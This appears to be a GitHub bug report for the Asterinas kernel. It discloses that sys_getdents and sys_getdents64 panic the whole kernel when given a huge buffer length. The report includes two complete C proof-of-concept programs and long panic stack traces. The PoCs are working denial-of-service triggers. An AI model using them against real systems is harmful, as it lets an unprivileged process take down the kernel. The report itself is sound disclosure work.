Capacity overflow in `sys_getdents()`
Describe the bug
There is a capacity overflow (a kernel panic, i.e. a denial of service triggerable from unprivileged user space) in `sys_getdents()` at kernel/src/syscall/getdents64.rs:36 when `sys_getdents` is called with a very large `buf_len`. Judging from the stack trace below (`vec/mod.rs` → `spec_from_elem.rs` → `raw_vec.rs`), the kernel allocates a `Vec` sized directly by the untrusted `buf_len` — presumably something like `vec![0; buf_len]` — and the allocator panics with "capacity overflow" before the buffer pointer or length is validated.
https://github.com/asterinas/asterinas/blob/f01772ca853e76d3076a561da3281034e3a46196/kernel/src/syscall/getdents64.rs#L36
To Reproduce
- Compile a program which calls
sys_getdents:
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
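/*
 * PoC: invoke getdents(2) with a deliberately invalid user buffer and the
 * largest representable count.
 *
 * The kernel appears to size an internal buffer from the untrusted count
 * before validating the user pointer (the panic originates in the Vec
 * allocation reached from getdents64.rs:36), so this call panics the whole
 * kernel with "capacity overflow" instead of returning an error.
 *
 * On a correctly hardened kernel the syscall should simply fail (Linux
 * returns EFAULT for an unreadable buffer), which is what the result check
 * below reports.
 */
int main(void) {
    int fd = open("/proc", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    char *buffer = (char *)0x4;   /* intentionally invalid (unmapped) user address */
    size_t count = (size_t)-1;    /* SIZE_MAX: exceeds any allocatable Vec capacity */

    long result = syscall(SYS_getdents, fd, buffer, count);
    if (result < 0) {
        /* Expected outcome on a kernel that validates buf_len / the pointer. */
        perror("getdents");
    } else {
        printf("getdents returned %ld\n", result);
    }

    close(fd);
    return 0;
}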
- Run the compiled program in Asterinas.
Expected behavior
Observed behavior: Asterinas panics with `capacity overflow` and the entire kernel is terminated, so an unprivileged process can take down the system. Expected behavior: the syscall should fail and return an error to the caller (Linux returns EFAULT for an invalid buffer) instead of allocating a buffer of the user-supplied size and panicking.
Environment
- Official docker asterinas/asterinas:0.8.1
- 11th Gen Intel(R) Core(TM) i7-1165G7 @ 2.80GHz
- Asterinas version: main 8bfbdf6
Logs
~ # /root/getdents.c
panicked at /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:25:5:
capacity overflow
Printing stack trace:
1: fn 0xffffffff887e5490 - pc 0xffffffff887e54fa / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a9296c0;
2: fn 0xffffffff887e52a0 - pc 0xffffffff887e53f0 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929720;
3: fn 0xffffffff88049000 - pc 0xffffffff8804900a / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929870;
4: fn 0xffffffff889c2af0 - pc 0xffffffff889c2b72 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929880;
5: fn 0xffffffff88987fe0 - pc 0xffffffff88988009 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929910;
6: fn 0xffffffff88989710 - pc 0xffffffff8898974e / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929950;
7: fn 0xffffffff8874d1b0 - pc 0xffffffff8874d20f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929990;
8: fn 0xffffffff88742380 - pc 0xffffffff887423b4 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a9299f0;
9: fn 0xffffffff88749e10 - pc 0xffffffff88749e2f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929a90;
10: fn 0xffffffff885af2a0 - pc 0xffffffff885af899 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929ab0;
11: fn 0xffffffff884ac9d0 - pc 0xffffffff884c30aa / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929f30;
12: fn 0xffffffff884ac1b0 - pc 0xffffffff884ac23e / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a9403d0;
13: fn 0xffffffff884a15f0 - pc 0xffffffff884a216f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940570;
14: fn 0xffffffff883a06f0 - pc 0xffffffff883a06fe / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940f90;
15: fn 0xffffffff88857ed0 - pc 0xffffffff88857ee6 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940fb0;
16: fn 0xffffffff88832c80 - pc 0xffffffff88832ce9 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940fd0;
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a941000;
[OSDK] The kernel seems panicked. Parsing stack trace for source lines:
( 1) /root/asterinas/ostd/src/panicking.rs:113
( 2) /root/asterinas/ostd/src/panicking.rs:59
( 3) 73ctk84we8vz1kw7hv2sr00er:?
( 4) ??:?
( 5) alloc.4436a8b0cd505e33-cgu.0:?
( 6) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:594
( 7) ??:?
( 8) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/spec_from_elem.rs:52
( 9) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/mod.rs:2737
( 10) /root/asterinas/kernel/src/syscall/getdents64.rs:36
( 11) /root/asterinas/kernel/src/syscall/mod.rs:171
( 12) /root/asterinas/kernel/src/syscall/mod.rs:328
( 13) /root/asterinas/kernel/src/thread/task.rs:69
( 14) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/ops/function.rs:79
( 15) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/boxed.rs:2077
( 16) /root/asterinas/ostd/src/task/mod.rs:175
The same bug exists in `sys_getdents64()` (the panic there is reached from kernel/src/syscall/getdents64.rs:66 according to the second stack trace below); it can be triggered by:
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
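/*
 * PoC for the getdents64(2) variant of the same bug: an invalid user buffer
 * plus the largest representable count.
 *
 * As with getdents(2), the kernel appears to size an internal buffer from the
 * untrusted count before validating the user pointer (the Vec allocation is
 * reached from getdents64.rs:66 in the stack trace), so the call panics the
 * whole kernel with "capacity overflow" instead of returning an error.
 *
 * On a correctly hardened kernel the syscall should simply fail (Linux
 * returns EFAULT for an unreadable buffer), which is what the result check
 * below reports.
 */
int main(void) {
    int fd = open("/proc", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    char *buffer = (char *)0x4;   /* intentionally invalid (unmapped) user address */
    size_t count = (size_t)-1;    /* SIZE_MAX: exceeds any allocatable Vec capacity */

    long result = syscall(SYS_getdents64, fd, buffer, count);
    if (result < 0) {
        /* Expected outcome on a kernel that validates buf_len / the pointer. */
        perror("getdents64");
    } else {
        printf("getdents64 returned %ld\n", result);
    }

    close(fd);
    return 0;
}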
And the crash log is:
~ # ./getdents64.c
panicked at /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:25:5:
capacity overflow
Printing stack trace:
1: fn 0xffffffff887e5b50 - pc 0xffffffff887e5bba / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa296c0;
2: fn 0xffffffff887e5960 - pc 0xffffffff887e5ab0 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29720;
3: fn 0xffffffff88049000 - pc 0xffffffff8804900a / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29870;
4: fn 0xffffffff889c31b0 - pc 0xffffffff889c3232 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29880;
5: fn 0xffffffff889886a0 - pc 0xffffffff889886c9 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29910;
6: fn 0xffffffff88989dd0 - pc 0xffffffff88989e0e / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29950;
7: fn 0xffffffff8874d870 - pc 0xffffffff8874d8cf / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29990;
8: fn 0xffffffff88742a40 - pc 0xffffffff88742a74 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa299f0;
9: fn 0xffffffff8874a4d0 - pc 0xffffffff8874a4ef / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29a90;
10: fn 0xffffffff885b0360 - pc 0xffffffff885b0959 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29ab0;
11: fn 0xffffffff884ad090 - pc 0xffffffff884d68e8 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29f30;
12: fn 0xffffffff884ac870 - pc 0xffffffff884ac8fe / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa403d0;
13: fn 0xffffffff884a1cb0 - pc 0xffffffff884a282f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40570;
14: fn 0xffffffff883a06f0 - pc 0xffffffff883a06fe / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40f90;
15: fn 0xffffffff88858590 - pc 0xffffffff888585a6 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40fb0;
16: fn 0xffffffff88833340 - pc 0xffffffff888333a9 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40fd0;
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa41000;
[OSDK] The kernel seems panicked. Parsing stack trace for source lines:
( 1) /root/asterinas/ostd/src/panicking.rs:113
( 2) /root/asterinas/ostd/src/panicking.rs:59
( 3) 73ctk84we8vz1kw7hv2sr00er:?
( 4) ??:?
( 5) alloc.4436a8b0cd505e33-cgu.0:?
( 6) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:594
( 7) ??:?
( 8) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/spec_from_elem.rs:52
( 9) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/mod.rs:2737
( 10) /root/asterinas/kernel/src/syscall/getdents64.rs:66
( 11) /root/asterinas/kernel/src/syscall/mod.rs:171
( 12) /root/asterinas/kernel/src/syscall/mod.rs:328
( 13) /root/asterinas/kernel/src/thread/task.rs:69
( 14) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/ops/function.rs:79
( 15) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/boxed.rs:2077
( 16) /root/asterinas/ostd/src/task/mod.rs:175
make: *** [Makefile:172: run] Error 1